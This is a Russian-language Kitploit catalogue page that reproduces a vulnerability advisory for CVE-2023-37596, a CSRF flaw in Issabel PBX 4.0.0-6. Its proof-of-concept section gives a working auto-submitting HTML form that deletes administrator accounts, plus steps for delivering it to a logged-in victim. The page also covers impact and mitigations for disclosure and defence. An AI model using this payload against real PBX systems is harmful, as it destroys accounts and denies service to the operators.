Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-37596 — CVE-2023-37596 - это уязвимость межсайтовой подделки запроса (CSRF), обнаруженная в Issabel PBX версии 4.0.0-6, широко используемой платформе унифицированных коммуникаций с открытым исходным кодом. | Kitploit
Инструменты/GitHubGitHub/sahiloj/cve-2023-37596
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubsahiloj/cve-2023-37596

CVE-2023-37596

CVE-2023-37596 - это уязвимость межсайтовой подделки запроса (CSRF), обнаруженная в Issabel PBX версии 4.0.0-6, широко используемой платформе унифицированных коммуникаций с открытым исходным кодом.

Репозиторий
1157 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-37596 — issabel-pbx 4.0.0-6: Межсайтовая подделка запроса (CSRF) — Удаление любого пользователя

Серьезность: Высокая  |  CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H)  |  CWE: CWE-352


Содержание

  • Обзор
  • Сведения об уязвимости
  • Влияние
  • Затронутая версия
  • Сценарий атаки
  • Подтверждение концепции (шаги для воспроизведения)
  • Смягчение / Устранение
  • Ссылки
  • График раскрытия
  • Автор

Обзор

Уязвимость Межсайтовая подделка запроса (CSRF) была обнаружена в Issabel PBX версии 4.0.0-6. Конечная точка управления пользователями не реализует никакой защиты от CSRF, что позволяет неаутентифицированному удаленному злоумышленнику создать вредоносную веб-страницу, которая — при посещении аутентифицированным администратором Issabel — незаметно удаляет любую учетную запись пользователя из системы. Многократная эксплуатация может сделать все приложение недоступным при удалении всех административных пользователей.


Сведения об уязвимости

ПолеЗначение
Идентификатор CVECVE-2023-37596
Тип уязвимостиМежсайтовая подделка запроса (CSRF)
CWECWE-352
ПродуктIssabel PBX
Уязвимая версия4.0.0-6
Домашняя страница вендораhttps://www.issabel.org/
Репозиторий ПОhttps://github.com/IssabelFoundation/issabelPBX
Протестировано наWindows
Опубликовано CVE10/07/2023
ОбнаруженоSahil Ojha

Влияние

Поскольку Issabel PBX не проверяет источник запросов, изменяющих состояние, в своем интерфейсе управления пользователями, успешная CSRF-атака позволяет злоумышленнику:

  • Удалить любую учетную запись пользователя — включая основного администратора — без ведома жертвы.
  • Вызвать отказ в обслуживании (DoS) — при удалении всех пользователей никто не может войти в систему, что делает панель администрирования PBX полностью недоступной.
  • Нарушить работу телефонных услуг — конфигурация и управление телефонной системой становятся недоступными до тех пор, пока учетная запись не будет восстановлена вручную на уровне сервера.

Затронутая версия

ПродуктЗатронутая версияСтатус
issabel-pbx4.0.0-6Уязвим

Сценарий атаки

Злоумышленник размещает вредоносную HTML-страницу, содержащую поддельный HTTP-запрос к конечной точке удаления пользователя приложения Issabel PBX. Атака срабатывает автоматически (или по клику на кнопку), когда пользователь, уже аутентифицированный в Issabel, посещает эту вредоносную страницу в том же браузере. Поскольку браузер автоматически включает файлы cookie сеанса жертвы в каждый запрос, сервер принимает поддельный запрос на удаление как легитимный.

Со стороны злоумышленника не требуется никаких специальных привилегий — только вектор социальной инженерии (фишинговая ссылка, вредоносная реклама и т. д.), чтобы заманить аутентифицированного администратора на подготовленную страницу.

Ключевые характеристики этой атаки:

  • Аутентификация не требуется со стороны злоумышленника.
  • Одним щелчком (или даже без щелчков, если используются `` / автоотправляемые формы) достаточно для запуска эксплойта.
  • Любой идентификатор пользователя (например, id=1, id=2, ...) может быть целью при изменении полезной нагрузки.
  • Атака невидима для жертвы; страница может отображать не связанный с атакой контент, в то время как поддельный запрос отправляется незаметно.

Подтверждение концепции (шаги для воспроизведения)

Предварительные требования

  • Burp Suite (Community или Professional редакция)
  • Браузер, настроенный на проксирование трафика через Burp Suite
  • Экземпляр Issabel PBX 4.0.0-6, доступный в сети

Шаг 1 — Вход в систему как администратор

Перейдите на страницу списка пользователей Issabel PBX и аутентифицируйтесь с помощью учетных данных администратора:

https://<Issabel-IP>/index.php?menu=userlist

Шаг 1 — Список пользователей Issabel PBX


Шаг 2 — Захват запроса на удаление пользователя в Burp Suite

  1. При активном прокси Burp Suite нажмите кнопку Delete рядом с целевым пользователем.
  2. В Proxy → HTTP history Burp Suite найдите захваченный DELETE/POST-запрос.
  3. Щелкните правой кнопкой мыши по запросу и выберите Engagement Tools → Generate CSRF PoC.

Шаг 2 — Захват запроса на удаление в Burp Suite


Шаг 3 — Генерация и сохранение CSRF-эксплойта

Burp Suite создаст HTML-страницу, аналогичную приведенной ниже. Сохраните ее как .html файл (например, csrf_exploit.html):

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Auto-submit the form as soon as the page loads
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Примечание: Замените <Issabel-IP> на IP-адрес или имя хоста целевого сервера и измените значение id, чтобы атаковать другую учетную запись пользователя.


Шаг 4 — Доставка эксплойта аутентифицированному администратору

Отправьте файл csrf_exploit.html (или ссылку на место, где он размещен) пользователю, который в данный момент вошел в Issabel PBX. Когда жертва откроет страницу, форма будет отправлена автоматически, и целевой пользователь будет удален без какого-либо запроса подтверждения.

Шаг 4 — CSRF-эксплойт выполнен, пользователь удален

Шаг 4 — Подтверждение удаления пользователя


Смягчение / Устранение

Следующие меры защиты должны быть применены вендором и/или системными администраторами для устранения этой уязвимости:

  1. Внедрение CSRF-токенов — Генерируйте криптографически случайный, привязанный к сессии (или к запросу) токен и проверяйте его на стороне сервера для каждого запроса, изменяющего состояние. Запросы, не содержащие действительный токен, должны отклоняться.

  2. Атрибут SameSite для cookie — Установите для сессионной cookie атрибут SameSite в значение Strict или Lax, чтобы предотвратить отправку сессионной cookie в кросс-доменных запросах в большинстве браузеров.

  3. Проверка заголовков Origin / Referer — На стороне сервера отклоняйте любой запрос, изменяющий состояние, в котором заголовок Origin или Referer не соответствует собственному домену приложения.

  4. Требуйте повторную аутентификацию для деструктивных действий — Запрашивайте повторный ввод пароля перед обработкой необратимых действий, таких как удаление учетных записей пользователей.

  5. Применяйте принцип наименьших привилегий — Убедитесь, что только пользователи с явной ролью администратора могут получить доступ к функции удаления пользователей, что уменьшает радиус поражения успешной атаки.

До выхода патча от вендора администраторам рекомендуется:

  • Ограничить доступ к панели администрирования Issabel PBX только доверенными IP-адресами с помощью правил брандмауэра.
  • Избегать посещения недоверенных веб-сайтов во время работы в панели администратора.

Ссылки

Скачать инструмент